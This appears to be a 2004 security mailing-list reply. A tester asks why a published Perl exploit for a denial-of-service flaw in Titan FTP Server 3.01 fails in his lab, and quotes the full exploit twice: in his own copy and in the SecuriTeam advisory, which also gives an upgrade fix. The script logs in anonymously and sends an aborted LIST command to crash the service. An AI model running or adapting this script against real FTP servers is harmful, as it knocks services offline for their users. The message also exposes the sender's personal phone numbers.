Re: Titan FTP Server Aborted LIST DoS

[Gene Ken <gken () vip sina com>]

Hi Aviram,

  I have some trouble with the testing of current exploit, the below
is my tested procedure:

1) In my test bed, the host side is winxp professional with ip_addr 192.168.0.2
  (english, 5.1 build 2600), and the client side is redhat linux 9 using 
NAT in
  Vmware Workstation 4.5.1 build-7568 with ip_addr 192.168.92.3.

2) I have successfully Titan Ftp Server v3.01 Build 163 installed on Winxp Pro
   platform. also the perl script u mentioned in ur article has successfully
   executed like as the below:

/* on my redhat box, i use ftp to verify if the titan ftp server is 
running, the
   result is the info as below: */

[gken@rh9 gken]$ ftp 192.168.0.2
Connected to 192.168.0.2 (192.168.0.2).
220 Titan FTP Server 3.01.163 Ready.
Name (192.168.0.2:gken): gken
331 User name okay, need password.
Password:
230-Welcome gken from 192.168.0.2. You are now logged in to the server.
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.

/* executing titan.pl script */
[gken@rh9 gken]$ perl titan.pl
Combination:
cannot connect to ftp daemon on 192.168.0.2 at titan.pl line 22.


   how to tackle this? thx in advance!



---the titan.pl---
 #!/usr/bin/perl
 # Test for Titan FTP server security vulnerability
 #
 # Orkut users? Come join the SecuriTeam community
 # http://www.orkut.com/Community.aspx?cmm=44441
 #
 use IO::Socket;

 $host = "192.168.0.2";

 my @combination;
 $combination[0] = "LIST \r\n";

 for (my $i = 0; $combination[$i] ; $i++)
 {
  print "Combination: $1\n";

  $remote = IO::Socket::INET->new ( Proto => "tcp",
      PeerAddr => $host,
      PeerPort => "2112",
      );
  unless ($remote) { die "cannot connect to ftp daemon on $host" }

  print "connected\n";
  while (<$remote>)
  {
   print $_;
   if (/220 /)
   {
    last;
   }
  }

  $remote->autoflush(1);

  my $ftp = "USER anonymous\r\n";

  print $remote $ftp;
  print $ftp;

  while (<$remote>)
  {
   print $_;
   if (/331 /)
   {
    last;
   }
  }

  $ftp = "PASS a\@b.com\r\n";
  print $remote $ftp;
  print $ftp;

  while (<$remote>)
  {
   print $_;
   if (/230 /)
   {
    last;
   }
  }

  $ftp = $combination[$i];

  print $remote $ftp;
  print $ftp;

  while (<$remote>)
  {
   print $_;
   if (/150 /)
   {
    last;
   }


  close $remote;
 }
}

At 05:51 AM 5/5/2004, you wrote:
>  Titan FTP Server Aborted LIST DoS
> ----------------------------------------------------
>
>
> Article reference:
> http://www.securiteam.com/windowsntfocus/5RP0215CUU.html
>
>
> SUMMARY
>
> A security vulnerability exists in South River Technologies' Titan FTP 
> Server.
> An attacker issuing a LIST command and disconnecting before the LIST command
> had the time to connect, will cause the program to try and access an invalid
> socket. This will result in the FTP service's crash (and in turn, no longer
> being able to service any additional users).
>
>
> DETAILS
>
> Vulnerable Systems:
>   * Titan FTP Server version 3.01 build 163
>
>  Immune Systems:
>   * Titan FTP Server version 3.10 build 169
>
>  Solution:
>  To solve this issue upgrade to the latest version (3.10 build 169 or newer).
>
>  Exploit:
>  #!/usr/bin/perl
>  # Test for Titan FTP server security vulnerability
>  #
>  # Orkut users? Come join the SecuriTeam community
>  # http://www.orkut.com/Community.aspx?cmm=44441
>  #
>  use IO::Socket;
>
>  $host = "192.168.1.243";
>
>  my @combination;
>  $combination[0] = "LIST \r\n";
>
>  for (my $i = 0; $combination[$i] ; $i++)
>  {
>   print "Combination: $1\n";
>
>   $remote = IO::Socket::INET->new ( Proto => "tcp",
>       PeerAddr => $host,
>       PeerPort => "2112",
>       );
>   unless ($remote) { die "cannot connect to ftp daemon on $host" }
>
>   print "connected\n";
>   while (<$remote>)
>   {
>    print $_;
>    if (/220 /)
>    {
>     last;
>    }
>   }
>
>   $remote->autoflush(1);
>
>   my $ftp = "USER anonymous\r\n";
>
>   print $remote $ftp;
>   print $ftp;
>
>   while (<$remote>)
>   {
>    print $_;
>    if (/331 /)
>    {
>     last;
>    }
>   }
>
>   $ftp = "PASS a\@b.com\r\n";
>   print $remote $ftp;
>   print $ftp;
>
>   while (<$remote>)
>   {
>    print $_;
>    if (/230 /)
>    {
>     last;
>    }
>   }
>
>   $ftp = $combination[$i];
>
>   print $remote $ftp;
>   print $ftp;
>
>   while (<$remote>)
>   {
>    print $_;
>    if (/150 /)
>    {
>     last;
>    }
>
>
>   close $remote;
>  }
>
>
> ADDITIONAL INFORMATION
>
> SecurITeam would like to thank  <mailto:storm () securiteam com> STORM for
> finding this vulnerability.
>
>
>
>
> Regards,
> Aviram Jenik
> Beyond Security Ltd.
>
> http://www.BeyondSecurity.com
> http://www.SecuriTeam.com
>
> The First Integrated Network and Web Application Vulnerability Scanner:
> http://www.beyondsecurity.com/webscan-wp.pdf
>
>
>
>
> ====================
> ====================
>
> DISCLAIMER:
> The information in this bulletin is provided "AS IS" without warranty of any
> kind.
> In no event shall we be liable for any damages whatsoever including direct,
> indirect, incidental, consequential, loss of business profits or special
> damages.

Regards,

Gene Ken
86-10-62928315 (Home)
86-13901016339 (Cell)
/* Out of intense complexities, emerge intense simplicities. */